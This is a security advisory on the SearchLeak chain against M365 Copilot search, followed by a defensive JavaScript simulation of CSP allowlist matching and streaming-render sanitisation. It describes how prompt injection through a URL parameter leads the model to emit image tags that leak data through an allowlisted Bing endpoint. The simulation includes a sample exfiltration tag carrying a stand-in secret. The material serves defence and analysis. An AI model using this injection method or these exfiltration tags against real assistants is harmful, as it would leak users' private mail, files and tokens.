What happened
Varonis Threat Labs disclosed 'SearchLeak' on June 15, 2026 (CVE-2026-42824). Microsoft rates it Critical on its own severity scale; the listed CVSS base score is 6.5, and the two ratings are assigned independently. The attack chains three weaknesses in M365 Copilot Enterprise Search: (1) parameter-to-prompt (P2P) injection, in which attacker text carried in the 'q' URL parameter is passed to the model as part of the prompt; (2) an HTML rendering race condition, in which image tags injected into the streamed response are fetched by the browser before output sanitization has run; and (3) an SSRF-style hop through Bing's image-search endpoint, which is allowlisted in the Content Security Policy and therefore serves as an exfiltration proxy that the CSP permits. A single click on a crafted link hosted on a legitimate microsoft.com domain is enough to silently exfiltrate emails, calendar events, OneDrive/SharePoint files, and MFA tokens. Microsoft fixed the issue server-side in early June 2026, so no customer action is required. No in-the-wild exploitation has been observed.
Why it matters
SearchLeak is the third major Copilot exfiltration chain disclosed by security researchers, after EchoLeak (CVE-2025-32711) and Reprompt, and it confirms a repeating pattern: a prompt injection supplies the instructions, and ordinary web-security primitives (SSRF, HTML injection, rendering-order timing) supply the exfiltration channel, so the two combine into a compound attack surface with far higher impact than either alone. It also shows why AI-integrated enterprise search defeats traditional URL filtering and CSP host allowlists: the data leaves through a first-party, allowlisted domain, so both controls see what looks like legitimate traffic.
Applicability
M365 Copilot Enterprise Search customers: patched server-side, no action required. Security architects should review AI assistant rendering pipelines so that streamed model output is sanitized before it reaches the DOM rather than after the stream completes, audit CSP allowlists for trusted domains (especially *.bing.com and similar) whose endpoints will fetch or log attacker-chosen parameters, and treat all model output as untrusted input. Threat modelers should include parameter-to-prompt (P2P) injection as a standard attack vector in any LLM-integrated enterprise product.
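The following is an added example, not code from Varonis, Microsoft or the Copilot rendering pipeline. It models the two web-security primitives in the chain described above and the two review items listed here: a CSP host allowlist that admits any URL on an allowlisted domain regardless of its query string, and a streaming renderer that inserts chunks into the DOM before sanitizing them, beside the same renderer sanitizing each chunk first. The policy string, the page origin, the secret and the streamed chunks are all constructed for the example; the Bing URL shape is illustrative and the DOM is simulated, so nothing here is a working exploit against the real service.

```javascript
// Added example (not the page's or Microsoft's code): models CSP allowlist
// matching and a streaming-render race.  Policy, origin and chunks are constructed.

// --- 1. CSP host allowlists match origins, not paths or query strings -------

// Return the source expressions of the img-src directive of a CSP string.
function parseImgSrc(policy) {
  const directive = policy.split(";").map(s => s.trim()).find(s => s.startsWith("img-src "));
  return directive ? directive.slice("img-src ".length).split(/\s+/) : [];
}

// True when the policy lets an <img> load imgUrl from a page at pageOrigin.
// Models 'self', exact hosts and leading-wildcard hosts only (an assumption;
// real CSP matching has more cases, none of which look at the query string).
function cspAllowsImage(policy, pageOrigin, imgUrl) {
  const target = new URL(imgUrl);
  const self = new URL(pageOrigin);
  for (const src of parseImgSrc(policy)) {
    const host = src.replace(/^https?:\/\//, "");
    if (src === "'self'") {
      if (target.origin === self.origin) return true;
    } else if (host.startsWith("*.")) {
      if (target.hostname.endsWith(host.slice(1))) return true; // "*.bing.com" -> ".bing.com"
    } else if (target.hostname === host) {
      return true;
    }
  }
  return false;
}

// --- 2. Streaming HTML: sanitize before insertion, not after the stream ends -

const IMG_RE = /<img\b[^>]*\bsrc=["']([^"']+)["'][^>]*>/gi;

// Simulated DOM sink: as soon as the accumulated markup contains a complete
// <img> tag, the browser would fire a request for its src.  We record those.
function makeSink() {
  const state = { html: "", requests: [] };
  return {
    requests: state.requests,
    insert(fragment) {
      state.html += fragment;
      for (const m of state.html.matchAll(IMG_RE)) {
        if (!state.requests.includes(m[1])) state.requests.push(m[1]);
      }
    },
  };
}

// Stand-in for the output sanitizer: strip image tags from model output.
function sanitize(html) {
  return html.replace(IMG_RE, "");
}

// Racy pattern: each chunk goes into the DOM as it arrives; the sanitizer runs
// over the whole buffer only once the stream has finished.
function renderStreamRacy(chunks) {
  const sink = makeSink();
  let buffer = "";
  for (const c of chunks) { buffer += c; sink.insert(c); }
  sanitize(buffer); // too late: the image request fired when the tag completed
  return sink.requests;
}

// Hardened pattern: hold back any tag that has not closed yet, sanitize the
// complete prefix, and only then insert it.  Nothing unsanitized reaches the DOM.
function renderStreamSafe(chunks) {
  const sink = makeSink();
  let pending = "";
  for (const c of chunks) {
    pending += c;
    const lastOpen = pending.lastIndexOf("<");
    const complete = lastOpen > pending.lastIndexOf(">") ? pending.slice(0, lastOpen) : pending;
    pending = pending.slice(complete.length);
    sink.insert(sanitize(complete));
  }
  sink.insert(sanitize(pending));
  return sink.requests;
}

// --- Constructed scenario -------------------------------------------------

const PAGE_ORIGIN = "https://assistant.example.com";            // assumed host of the assistant UI
const POLICY = "default-src 'self'; img-src 'self' *.bing.com"; // assumed allowlist shape
const SECRET = "subject=Q3 board deck";                         // stand-in for exfiltrated data
// Model output as it might stream back after a prompt injection; the tag is
// split across chunks exactly as a token stream would split it.
const STREAM = [
  "Here are your results: <im",
  `g src="https://www.bing.com/images/search?q=${encodeURIComponent(SECRET)}">`,
  " done.",
];

function demo() {
  const racyRequests = renderStreamRacy(STREAM);
  const safeRequests = renderStreamSafe(STREAM);
  const cspAllowsExfil = racyRequests.length > 0 && cspAllowsImage(POLICY, PAGE_ORIGIN, racyRequests[0]);
  return { racyRequests, safeRequests, cspAllowsExfil };
}

console.log(demo());
```

Running `demo()` shows one image request leaving the racy renderer with the secret in its query string, the CSP check returning true for that URL because only the host is compared, and no request at all from the renderer that sanitizes before insertion. The host-suffix check is the whole point: a CSP allowlist answers "is this origin trusted?", never "does this endpoint fetch or log whatever it is given?", so any allowlisted domain with a parameter-driven fetcher is an exfiltration channel the policy cannot close.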